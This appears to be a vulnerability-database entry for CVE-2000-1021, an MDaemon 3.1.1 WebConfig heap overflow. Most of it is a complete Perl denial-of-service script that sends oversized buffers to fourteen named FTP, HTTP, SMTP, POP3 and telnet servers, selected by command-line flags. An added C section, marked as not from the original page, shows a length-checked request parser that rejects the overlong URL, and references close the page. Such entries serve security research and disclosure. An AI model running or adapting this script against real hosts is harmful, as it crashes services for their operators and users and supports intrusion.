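Alt-N MDaemon 3.1.1 DoS Vulnerability
Vulnerability ID | 1105627 | Vulnerability type | Buffer overflow |
Published | 1999-12-01 | Updated | 2005-10-20 |
CVE ID | CVE-2000-1021 |
CNNVD-ID | CNNVD-200012-063 |
Platform | Windows | CVSS score | 7.5 |
|Vulnerability source
|Vulnerability details
WebConfig in MDaemon 3.1.1 and earlier contains a heap-based buffer overflow. A remote attacker can use an overly long URL to cause a denial of service and possibly execute arbitrary commands.
|Exploit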
source: http://www.securityfocus.com/bid/1689/info
Alt-N MDaemon 3.1.1 is subject to a denial of service. If a remote user requests a specially crafted URL to the web services within MDaemon the service will crash. A restart of the service is required in order to gain normal functionality.
#!/usr/bin/perl
#####################################################################
# Based upon advisories by USSR (www.ussrback.com) #
# #
# Demonstration script to remotely overflow various server buffers, #
# resulting in a denial of service, for TESTING purposes only. #
# Runs on *nix & WinXX with perl & Net::Telnet available from CPAN #
# #
# G6 FTP Server v2.0 beta4/5 #
# MDaemon httpd Server v2.8.5.0 #
# Avirt Mail Server v3.5 #
# BisonWare FTP Server v3.5 #
# Vermillion FTP Server v1.23 #
# ZetaMail POP3 Server v2.1 #
# WFTPD FTP Server 2.40 #
# BFTelnet Server v1.1 #
# Broker FTP Server v3.5 #
# ExpressFS FTP server v2.x #
# XtraMail POP3 Server v1.11 #
# Cmail SMTP Server v2.4 #
# PakMail SMTP/POP3 v1.25 #
# #
# December '99 #
#####################################################################
use IO::Socket;
use Getopt::Std;
#use Net::Telnet;
getopts('h:p:t:u:v', \%args);
if(!defined($args{h}) && !defined($args{t})) {
print qq~Usage: $0 -h <victim> -t <number> ((-u username) | (-p password)) | -v
-h victim to test remote overflow DoS on
-t server type (check the -v option for list)
-u username authorisation (required if server prompts for username)
-p password authentication (required if user/passwd is expected)
-v lists all servers vulnerable to each DoS
~; exit; }
if(defined($args{u})) { $user=$args{u}; }
if(defined($args{p})) { $pass=$args{p}; }
if(defined($args{v})) { &vulnerable; }
if(defined($args{h}) && defined($args{t})){
if(($args{t}) == 1) { &G6; }
if(($args{t}) == 2) { &mdaemon; }
if(($args{t}) == 3) { &avirt; }
if(($args{t}) == 4) { &bisonware; }
if(($args{t}) == 5) { &vermillion; }
if(($args{t}) == 6) { &zetamail; }
if(($args{t}) == 7) { &wftpd; }
if(($args{t}) == 8) { &bftelnet; }
if(($args{t}) == 9) { &broker; }
if(($args{t}) == 10) { &expressfs; }
if(($args{t}) == 11) { &xtramail; }
if(($args{t}) == 12) { &cmail; }
if(($args{t}) == 13) { &pakmail; }
if(($args{t}) == 14) { &pakpop; }}
sub G6 {
$denial .= "A" x 2000;
$victim=$args{h};
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect.\n";
$socket->autoflush(1);
print $socket "$denial\n"; # user
print "\nSent overflow to $victim\n";
close $socket; }
sub mdaemon {
$victim=$args{h};
$denial .= "A" x 1025;
$url = "/$denial";
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "80") or die "Can't connect.\n";
print $socket "GET $url\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub avirt {
$victim=$args{h};
$denial .= "A" x 856;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "25") or die "Can't connect\n";
$socket->autoflush(1);
print $socket "user $user\n";
print $socket "pass $denial\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub bisonware {
$victim=$args{h};
$denial .= "A" x 2000;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect\n";
$socket->autoflush(1);
print $socket "$denial\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub vermillion {
$victim=$args{h};
$denial .= "A" x 504;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect\n";
$socket->autoflush(1);
print $socket "$user\n";
print $socket "$pass\n";
print $socket "cwd $denial\n";
for($i=0; $i<=3; $i++) { print $socket "CWD $denial\n"; }
print "\nSent overflow to $victim\n";
close $socket; }
sub zetamail {
$victim=$args{h};
$denial .= "A" x 3500;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "110") or die "Can't connect.\n";
print $socket "user $denial\n";
print $socket "pass $denial\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub wftpd {
$victim=$args{h};
$denial .= "A" x 255;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect.\n";
print $socket "$user\n";
print $socket "$pass\n";
print $socket "MKDIR $denial\n";
print $socket "CWD $denial\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub bftelnet {
# use Net::Telnet;
$victim=$args{h};
$denial .= "A" x 3090;
$telnet = new Net::Telnet ( Timeout =>10,
Errmode =>'die');
$telnet->open('$victim');
$telnet->waitfor('/Login: $/i');
$telnet->print('$denial');
print "\nSent overflow to $victim\n";
close $telnet; }
sub broker {
$victim=$args{h};
$denial .= "A" x 2730;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect.\n";
print $socket "$denial\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub expressfs {
$victim=$args{h};
$denial .= "A" x 654;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "21") or die "Can't connect.\n";
print $socket "$denial\n";
print $socket "AAAAAAAAAAAAAAAAAAA\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub xtramail {
$victim=$args{h};
$denial .= "A" x 2930;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "25") or die "Can't connect.\n";
print $socket "MAIL FROM: test\@localhost\n";
print $socket "RCPT TO: $denial\@localhost\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub cmail {
$victim=$args{h};
$denial .= "A" x 7090;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "25") or die "Can't connect.\n";
print $socket "MAIL FROM: $denial\@localhost\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub pakmail {
$victim=$args{h};
$denial .= "A" x 1390;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "25") or die "Can't connect.\n";
print $socket "MAIL FROM: test\@localhost\n";
print $socket "RCPT TO: $denial\@localhost\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub pakpop {
$victim=$args{h};
$denial .= "A" x 1400;
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $victim,
PeerPort => "110") or die "Can't connect.\n";
print $socket "user test\n";
print $socket "pass $denial\n";
print "\nSent overflow to $victim\n";
close $socket; }
sub vulnerable {
print qq~
______________________________________________________________________________
Vulnerable Daemon Version Vulnerable Daemon Version
______________________________________________________________________________
[1] G6 FTP Server v2.0b4/5 [2] MDaemon httpd Server v2.8.5.0
[3] Avirt Mail Server v3.5 [4] BisonWare FTP Server v3.5
[5] Vermillion FTP Server v1.23 [6] ZetaMail SMTP Server v2.1
[7] WFTPD FTP Server v2.40 [8] BFTelnet Server v1.1
[9] Broker FTP Server v3.5 [10] ExpressFS FTP Server v2.x
[11] XtraMail POP3 Server v1.11 [12] Cmail SMTP Server v2.4
[13] PakMail SMTP Server v1.25 [14] PakMail POP3 Server v1.25
~; exit; }
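A defensive counterpart to the MDaemon case in the script above (a GET whose path is padded with 1025 "A" bytes), as an added example that is not part of the original page and is not MDaemon's code: a request-line parser that checks the target length before copying it. The names parse_request_line, status_for_padded_path and MAX_TARGET are hypothetical, and the 1024-byte buffer capacity is an assumption.

```c
#include <stdio.h>
#include <string.h>

/* Assumed capacity of the server's request-target buffer (hypothetical). */
#define MAX_TARGET 1024
enum { PARSE_OK = 200, PARSE_BAD_REQUEST = 400, PARSE_URI_TOO_LONG = 414 };

/* Parse "METHOD SP target [SP version] LF" from a buffer of known length.
 * The target is copied only after its length is checked against out_cap. */
int parse_request_line(const char *line, size_t len, char *out, size_t out_cap)
{
    const char *end = memchr(line, '\n', len);
    if (end == NULL)
        return PARSE_BAD_REQUEST;              /* no terminator inside len */
    if (end > line && end[-1] == '\r')
        end--;                                 /* accept CRLF as well as LF */
    const char *sp = memchr(line, ' ', (size_t)(end - line));
    if (sp == NULL || sp == line)
        return PARSE_BAD_REQUEST;              /* missing method or target */
    const char *target = sp + 1;
    const char *tend = memchr(target, ' ', (size_t)(end - target));
    if (tend == NULL) tend = end;              /* "GET /path" with no version */
    size_t tlen = (size_t)(tend - target);
    if (tlen == 0 || target[0] != '/')
        return PARSE_BAD_REQUEST;
    if (tlen >= out_cap)
        return PARSE_URI_TOO_LONG;             /* reject: never truncate or copy */
    memcpy(out, target, tlen);
    out[tlen] = '\0';
    return PARSE_OK;
}

/* Constructed input: "GET /" + a_count 'A' bytes + LF, the shape sent above. */
int status_for_padded_path(size_t a_count)
{
    static char req[8192];
    char target[MAX_TARGET];
    if (a_count > sizeof req - 6) return PARSE_BAD_REQUEST;
    memcpy(req, "GET /", 5);
    memset(req + 5, 'A', a_count);
    req[5 + a_count] = '\n';
    return parse_request_line(req, 6 + a_count, target, sizeof target);
}

int main(void)
{
    printf("1022 -> %d, 1025 -> %d\n", status_for_padded_path(1022), status_for_padded_path(1025));
    return 0;
}
```

The padded request is answered with 414 instead of reaching a copy, while a path that fits the buffer with its terminator is accepted.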
|References
Source: BID
Name: 1689
Link: http://www.securityfocus.com/bid/1689
Source: XF
Name: mdaemon-url-dos
Link: http://xforce.iss.net/static/5250.php
Source: BUGTRAQ
Name: 20000917 VIGILANTE-2000012: Mdaemon Web Services Heap Overflow DoS
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=96925269716274&w=2